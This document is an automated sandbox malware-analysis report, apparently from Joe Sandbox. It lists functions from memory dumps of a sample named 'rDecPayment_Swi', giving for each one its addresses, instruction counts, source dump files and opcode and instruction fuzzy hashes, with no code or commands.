                                            • Instruction ID: 2f21323473309e13872e2882fb72ce6f45c86b1103afbcf8b4bfb92e120fb297
                                            • Opcode Fuzzy Hash: c33cef909e92fd39fde4029981c80876f764b70773a9f19a3ef057263fbd15dd
                                            • Instruction Fuzzy Hash: 1CD09230A05629CFCB24DF25EC98B8A7BB5FF09241F00A6A88449A2258DA741E888F01
                                            Function 05E3F748 Relevance: .4, Instructions: 437COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9af357352c58090be34c2079eff76bbf2303446e34fc1ba605bb9574ec31a541
                                            • Instruction ID: 09e86cef8786a77572faf114d458fe3083c599c51367d5123dab714ea42acdd2
                                            • Opcode Fuzzy Hash: 9af357352c58090be34c2079eff76bbf2303446e34fc1ba605bb9574ec31a541
                                            • Instruction Fuzzy Hash: 89122934B00218CFDB14EF64C899A9DBBB2BF89300F5095A9D48AAB355DB34ED85CF50
                                            Function 05E3F738 Relevance: .2, Instructions: 232COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 44db2a7f702dc833458ba48399e5d6feb410253c52159c44274cd5f6557b18a6
                                            • Instruction ID: 199575c4c406fb499fa7af8166684684a1f4ce72a9732307badcf5f73c2feb26
                                            • Opcode Fuzzy Hash: 44db2a7f702dc833458ba48399e5d6feb410253c52159c44274cd5f6557b18a6
                                            • Instruction Fuzzy Hash: CDA11874B00214CFDB14DF28C999B99BBB6BF88300F5095A9E48AAB365DF749D85CF40
                                            Function 05E32828 Relevance: .2, Instructions: 223COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1c7fcc7e151278adf81f3ef0dcddb59d738384e60552a8e7d1acb601bd01018b
                                            • Instruction ID: 39defc12f8ae810b01c8e771895a1d7f9a58d66c710453bc913331cd2118d6cc
                                            • Opcode Fuzzy Hash: 1c7fcc7e151278adf81f3ef0dcddb59d738384e60552a8e7d1acb601bd01018b
                                            • Instruction Fuzzy Hash: 8B817E39B01214DFEB14CFA9D54AAADBBF2FF88311F1440AAE9929B350DB35D941CB50
                                            Function 05E38170 Relevance: .2, Instructions: 208COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e1f9603f0da60663cd5aff3a3ed842bd3e17e593416660e382111989787aa00d
                                            • Instruction ID: f01a22b5c150dbf24e4a5a8bf04405616d44e8849ffbca539e740fb45b127283
                                            • Opcode Fuzzy Hash: e1f9603f0da60663cd5aff3a3ed842bd3e17e593416660e382111989787aa00d
                                            • Instruction Fuzzy Hash: 91812835A05618CFDB14DF68C48899EBBF6FF48710B1691A9E846DB360DB70ED42CB50
                                            Function 05E3B438 Relevance: .1, Instructions: 143COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f5e539a2560c747f6b35b9245c98db3bc6be5a2d0e9e74d0eb06bde03bc478d1
                                            • Instruction ID: b2bb158ef8c485d9e59055a41dd036c7e892d5e3b87108caf7777cfd6f307eef
                                            • Opcode Fuzzy Hash: f5e539a2560c747f6b35b9245c98db3bc6be5a2d0e9e74d0eb06bde03bc478d1
                                            • Instruction Fuzzy Hash: DA515E34B10519DFDB04AF68E459AAEBBBAFF88701F00811AF5039B364DF749906CB81
                                            Function 05E575C8 Relevance: .1, Instructions: 114COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334963371.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e50000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ee8001e20c3120feac2e5f684f3a07aed7165bcf50b1a80d26a205078078b5f5
                                            • Instruction ID: 64ea026ca4693a65e0930bfedccfd993b2c58eee33d9e844cd2dc06eb1227afd
                                            • Opcode Fuzzy Hash: ee8001e20c3120feac2e5f684f3a07aed7165bcf50b1a80d26a205078078b5f5
                                            • Instruction Fuzzy Hash: 5D51E174E01208CFDB18DFB9D484A9DBBB2FF88344F20912AE855AB350DB759945CF40
                                            Function 05E575BB Relevance: .1, Instructions: 107COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334963371.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e50000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 10ff36998c7ffff6d95e46bb85f9f46bfa91d50024fef77aaac9ee022651144d
                                            • Instruction ID: ae3954d99a16c24a78d452ed7682088209edcc0f5fd2aad5bc97262d3c89ac18
                                            • Opcode Fuzzy Hash: 10ff36998c7ffff6d95e46bb85f9f46bfa91d50024fef77aaac9ee022651144d
                                            • Instruction Fuzzy Hash: 5741E274E01208CFDB58DFB9D484A9DBBB2FF88354F20912AD819AB360DB359842CF00
                                            Function 05E3E010 Relevance: .1, Instructions: 103COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f8a322eb055d27fb06a5a8eb536aebee3a903f6614d19dca54030008553e4119
                                            • Instruction ID: 5a1128c3ed68815cde06d3aa59faa5f0ac3f493f81ffce7c2d6a731be7af1ea9
                                            • Opcode Fuzzy Hash: f8a322eb055d27fb06a5a8eb536aebee3a903f6614d19dca54030008553e4119
                                            • Instruction Fuzzy Hash: FD310236600108DFDB05DF58D889EA9BBB6FF48324B0680A8E6099B372C731EC51DB80
                                            Function 05E38111 Relevance: .1, Instructions: 102COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f82952ce1443fd2458332d92cfe5edc5fe9bfbf98747150e991fb4cd43594edd
                                            • Instruction ID: 773b5bad6b4982e93c0371bdaf71d4b540d69051312f282048cac245b7809bd8
                                            • Opcode Fuzzy Hash: f82952ce1443fd2458332d92cfe5edc5fe9bfbf98747150e991fb4cd43594edd
                                            • Instruction Fuzzy Hash: 03310072A09218DFD709DBA8D84499EBBFAFF89310F04406BE545D7350DA30A906CB91
                                            Function 05E330D8 Relevance: .1, Instructions: 101COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0b4626082e34c73f340f3e25593cd63d82bd2f1a55e642b067d8bebb20265ea7
                                            • Instruction ID: d14d379c79ee829f04c95dd62d9396237af0736ec27c2fd2866adf812fda181c
                                            • Opcode Fuzzy Hash: 0b4626082e34c73f340f3e25593cd63d82bd2f1a55e642b067d8bebb20265ea7
                                            • Instruction Fuzzy Hash: C3416B71A003258FDB14CFA9C84AAAFBBB2FF88344F00892AD546E7251D734D945CB91
                                            Function 05E39533 Relevance: .1, Instructions: 98COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f51e8cff39a7c02f767fe0cfcc6ae9296303365c7bcd14218ec1f870a4b9f9cd
                                            • Instruction ID: ed3e4f9682a2c2583ca9f02c7b74474026ad983b05bdc384b4ab0e7ff18dfd7f
                                            • Opcode Fuzzy Hash: f51e8cff39a7c02f767fe0cfcc6ae9296303365c7bcd14218ec1f870a4b9f9cd
                                            • Instruction Fuzzy Hash: B83190313006019FD7249F29D89996A7BE7FFC86247248029E49ACB396DF75DC42CB90
                                            Function 05E5FBA8 Relevance: .1, Instructions: 95COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334963371.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e50000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e24028aee1bc97488c3b1404d2b4ea21fbba8a41dcd9187c5598e99bd0f5f0ca
                                            • Instruction ID: 20434094bd48766db3fc73af211ce009f33b700890fefe3e369e7ac241bddb61
                                            • Opcode Fuzzy Hash: e24028aee1bc97488c3b1404d2b4ea21fbba8a41dcd9187c5598e99bd0f5f0ca
                                            • Instruction Fuzzy Hash: 764102B0E04218CFDB48DFAAD895AEEBBF2BB89310F10D129D855A7344EB349945CF51
                                            Function 05E33A91 Relevance: .1, Instructions: 91COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 206b40304d2f7fad77a139c9b04790f6687f5b400b262ae8637d9ef121a51ae4
                                            • Instruction ID: ed71393be8ec08b06769602405fb0679b24920d09415e6d13df0d4166c3570c0
                                            • Opcode Fuzzy Hash: 206b40304d2f7fad77a139c9b04790f6687f5b400b262ae8637d9ef121a51ae4
                                            • Instruction Fuzzy Hash: 6B410674B012288FEB24DF64C996FA9B7B2FB48311F1055D5EA49AB391CA31ED81CF50
                                            Function 05E3C1D8 Relevance: .1, Instructions: 85COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2ed146788a91c568518e7a0f345042154fda4ff81ccf6c09ed15f68463dc8c79
                                            • Instruction ID: 6fa16ff25324046cbb3ab19ba9001910c0c5deb6e8c218b462310f97ef34cad1
                                            • Opcode Fuzzy Hash: 2ed146788a91c568518e7a0f345042154fda4ff81ccf6c09ed15f68463dc8c79
                                            • Instruction Fuzzy Hash: 1D210A313096008FE3249BADE848A67BBEAEFC0315B15907BE54ECB255DB75EC41C750
                                            Function 05E37C90 Relevance: .1, Instructions: 85COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3e9bf9bc5013780184da0e53580edc8972c28c8e99d7b1aa65fbaa3619056d12
                                            • Instruction ID: b3f92e31f80461fc645ce5cb78f99c14d7f7f8a038dc23f005654d4fed7ec7b0
                                            • Opcode Fuzzy Hash: 3e9bf9bc5013780184da0e53580edc8972c28c8e99d7b1aa65fbaa3619056d12
                                            • Instruction Fuzzy Hash: E9317F71200204DFEF14CF19D889BAE7BA6FF89359F548169F8458B2A0CB74DD95CB90
                                            Function 05E35560 Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7fe580af2d93ebbf8b27407879f4134a47af733fdaa7b94931b8f9aa1c4bcf6c
                                            • Instruction ID: deaedd00c9998e9dbf3f505fac1abecc3ac53b76611e7d7c9e10ffcf4af3e1e0
                                            • Opcode Fuzzy Hash: 7fe580af2d93ebbf8b27407879f4134a47af733fdaa7b94931b8f9aa1c4bcf6c
                                            • Instruction Fuzzy Hash: 32218971E04209EFEB10DFB8C909BFEBBF6AB04244F108066D48AD7290E734DA41CB91
                                            Function 010DD01C Relevance: .1, Instructions: 74COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2312954526.00000000010DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010DD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10dd000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0a8e8f1a8d92aacae532d727e4b6968e84eec6e098814438304db74327dbad04
                                            • Instruction ID: d665c179a1b1a8d1796afa5aae2baf1286fd3ac39ee08d86300f8838f56f29dc
                                            • Opcode Fuzzy Hash: 0a8e8f1a8d92aacae532d727e4b6968e84eec6e098814438304db74327dbad04
                                            • Instruction Fuzzy Hash: 90210371104344DFCB15DF58D984B2ABFA5FBC8354F2085A9E9490B286C33AD41AC7A2
                                            Function 05E56E01 Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334963371.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e50000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e1d303563612253d8388ad809b35e662073fba66f639f413629e63c58f136d4e
                                            • Instruction ID: 38f2d6dd11fa2db802161eca362e75e5504e72915d99ae2a7f7fa4c6dc576a6d
                                            • Opcode Fuzzy Hash: e1d303563612253d8388ad809b35e662073fba66f639f413629e63c58f136d4e
                                            • Instruction Fuzzy Hash: 5931B0B4E01228CFEB14DF69D888BDDB7F2FB45358F5090A9E859A7291DB709984CF01
                                            Function 05E318A0 Relevance: .1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0b6a59af6245969520789fd05a570b799ac1d409185338be172327b7b0b22488
                                            • Instruction ID: 0087be7c3494cfc2d3d3a89763673f69e4723ac6e6256e726a256f1075676cb5
                                            • Opcode Fuzzy Hash: 0b6a59af6245969520789fd05a570b799ac1d409185338be172327b7b0b22488
                                            • Instruction Fuzzy Hash: 41212C35A00219DFDB048F59C8999EEBFB6EF8D320F14512AE511A73A0DE719945CB50
                                            Function 05E39678 Relevance: .1, Instructions: 69COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a0fb6fb803acb4ce79cef59b5349a8da0eab4cecb1a98e801a2d768e7a80b201
                                            • Instruction ID: 6815f377c57d2672ef2d129dd94bfdd33328c84db9fc82cbc2ce5311dd227395
                                            • Opcode Fuzzy Hash: a0fb6fb803acb4ce79cef59b5349a8da0eab4cecb1a98e801a2d768e7a80b201
                                            • Instruction Fuzzy Hash: 3221F435A00209CFDB04DF58D549ADDBBF2FF48304F2001A5E445AB3A2CB75AD45CBA0
                                            Function 05E31229 Relevance: .1, Instructions: 69COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f995a87ff9ea2a87f3b5bba7dcec0e05bcbba99cbd3f5865ccd761445a8775b7
                                            • Instruction ID: 20ba97e84da9a9b4a4c43491ffff6f0272df0f760498e7cac93ff5970210764b
                                            • Opcode Fuzzy Hash: f995a87ff9ea2a87f3b5bba7dcec0e05bcbba99cbd3f5865ccd761445a8775b7
                                            • Instruction Fuzzy Hash: 4D219230610205DFDB48AB6DE946BAE7FAAEF88350F00853EE00AC7785DF759905CB90
                                            Function 05E57CD0 Relevance: .1, Instructions: 68COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334963371.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e50000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d49cf7cb6fa959eb3ae7ca1b3a530f937223798d985be9c9b31e3dc6a0a3d05b
                                            • Instruction ID: 12363bdc70e317db8b7ef6b2689956bbe27703c2e6615fc96ccbe0faaacca284
                                            • Opcode Fuzzy Hash: d49cf7cb6fa959eb3ae7ca1b3a530f937223798d985be9c9b31e3dc6a0a3d05b
                                            • Instruction Fuzzy Hash: CF213BB0E0420ACFCB14DFA9C4806BEFBB2FB89350F109269C855A3354D7349992CF80
                                            Function 010DD006 Relevance: .1, Instructions: 62COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2312954526.00000000010DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010DD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10dd000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 660c5f3531366ba67497e01ec06754b5a46fe6d61e6668176c1af42ed9a5e1f9
                                            • Instruction ID: 72312ccbed7f35f9e01f4ef5e4d3618114c527ae6aa7f1da8720c693e3c3f660
                                            • Opcode Fuzzy Hash: 660c5f3531366ba67497e01ec06754b5a46fe6d61e6668176c1af42ed9a5e1f9
                                            • Instruction Fuzzy Hash: 1521D4754093808FCB13CF14D994715BFB1FB85314F2885DAD8848B693C33AD41ACB62
                                            Function 06229E58 Relevance: .1, Instructions: 59COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2336054217.0000000006210000.00000040.00000800.00020000.00000000.sdmp, Offset: 06210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6210000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6688a8f0a3b28ea161e7e2bcb439d6c72a6470657cd21eee28ab976efcb53698
                                            • Instruction ID: 807b9286149a410a8c7aea17f366ad81229230e8413bd01acc7b48a128720802
                                            • Opcode Fuzzy Hash: 6688a8f0a3b28ea161e7e2bcb439d6c72a6470657cd21eee28ab976efcb53698
                                            • Instruction Fuzzy Hash: F021DB74E1121ACFCB54DFA9C084AAEBBF1BB88215F10846AD809B7350D736A941CFA1
                                            Function 05E3BD88 Relevance: .1, Instructions: 57COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b3b0ca6e7eae9fc654d7794a128b16a04fc3cc24d167eceb5204b6d9ee6965e8
                                            • Instruction ID: 112e04e83ec201ec25104771def3fc89563160ab7ca81f26d450a2236c7531d6
                                            • Opcode Fuzzy Hash: b3b0ca6e7eae9fc654d7794a128b16a04fc3cc24d167eceb5204b6d9ee6965e8
                                            • Instruction Fuzzy Hash: F6012D71710110CBAB149E2AE8D9D6AB7AFFFC4625354807AE507CB325CE75DC05C7A1
                                            Function 05E3FE2F Relevance: .1, Instructions: 57COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fea53186e7b5d97a3d44089d3f1e2c9bf36b078852db24d1e7f26fd542b69e76
                                            • Instruction ID: ecb9c1a2a5292c3d6c9c18994486af7d5afacca292bc960af53e38e54124c2ad
                                            • Opcode Fuzzy Hash: fea53186e7b5d97a3d44089d3f1e2c9bf36b078852db24d1e7f26fd542b69e76
                                            • Instruction Fuzzy Hash: BA2126B4E04209DFCB44DFA9C8859EEBBF6FB49310F10926AD964A7351D7349A05CFA0
                                            Function 05E395C8 Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 99bba9384d97b83d8a046a6682879d2161e25e26dd5cb63ceeb8421d10001fce
                                            • Instruction ID: d2762a8448d2129eb12f961651187ab60a4e6fd402c98a7f2ca55d8e15b4353f
                                            • Opcode Fuzzy Hash: 99bba9384d97b83d8a046a6682879d2161e25e26dd5cb63ceeb8421d10001fce
                                            • Instruction Fuzzy Hash: 2D117031300210CBDB256F29E42C96E7BA7EFC8625B14402AF88ACB355DF79C802CB90
                                            Function 05E32660 Relevance: .1, Instructions: 55COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 326fd34214c23d78b3a0ebd1e80a3191dd976f17928ec33d31853595e75d074a
                                            • Instruction ID: 0c19b91b6d17a830b62bfb461e7b6db6ca04c51860fd9e373ce79d0ad4a42f13
                                            • Opcode Fuzzy Hash: 326fd34214c23d78b3a0ebd1e80a3191dd976f17928ec33d31853595e75d074a
                                            • Instruction Fuzzy Hash: 38115E75B00215DFDB14DA69895ABAE7BF6BF88600F14402AE686D7380EA75C941CBA0
                                            Function 05E323C9 Relevance: .1, Instructions: 55COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9090a8f650447a6c0b637d49871ef4e53148200d50d7907f6c04487575837a97
                                            • Instruction ID: 406f29b78437d6866ac8f9b18147a4c511838da3db6450c18f0674cb485106af
                                            • Opcode Fuzzy Hash: 9090a8f650447a6c0b637d49871ef4e53148200d50d7907f6c04487575837a97
                                            • Instruction Fuzzy Hash: D8218078A42219DFDB04CF68D595AADBBB2BF49300F244055F942EB361CB34AD41CB50
                                            Function 05E5ED20 Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334963371.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e50000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0d368f3ad9f57b41a5cc2ebd3b17322cffc34f648fd6e561b5a3e60fba0c7c48
                                            • Instruction ID: 2f0cafa9936cd8181f26b99aeb3ab8fba1bb83b8aca31dcf5a85233164e76c40
                                            • Opcode Fuzzy Hash: 0d368f3ad9f57b41a5cc2ebd3b17322cffc34f648fd6e561b5a3e60fba0c7c48
                                            • Instruction Fuzzy Hash: 531181B0E04218CFDB18DF6AD8457EEBBB6BF89311F009099D949AB340DB745A84CF51
                                            Function 05E322A8 Relevance: .1, Instructions: 51COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 99b12a3855dd2279a379098a2a7bb3c8859bbd2ece170f38dde6a0419b30c867
                                            • Instruction ID: dda9946eeb26fb2fcfb1dcc61044a559d13778ecad7540b9406bddc36f1c2c06
                                            • Opcode Fuzzy Hash: 99b12a3855dd2279a379098a2a7bb3c8859bbd2ece170f38dde6a0419b30c867
                                            • Instruction Fuzzy Hash: 42014836340215EFD7108F59EC85F9A7BA9FB89721F108066FA55CB390CA71D810D750
                                            Function 05E3FE40 Relevance: .0, Instructions: 49COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f9fc73e288102fd8c3b01d2b0134e94b3e3996ccddedc6a9483e4d51d545f002
                                            • Instruction ID: 7fa351281e5a105cf047f63f0e232794d5d1ef550745a7dbfe6ac74956e53d6e
                                            • Opcode Fuzzy Hash: f9fc73e288102fd8c3b01d2b0134e94b3e3996ccddedc6a9483e4d51d545f002
                                            • Instruction Fuzzy Hash: 881106B4E04209DFCB44DFA9C9855AEBBF6FB49310F10916AD924A7355E7349A40CF90
                                            Function 05E5434B Relevance: .0, Instructions: 47COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334963371.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                            Joe Sandbox IDA Plugin
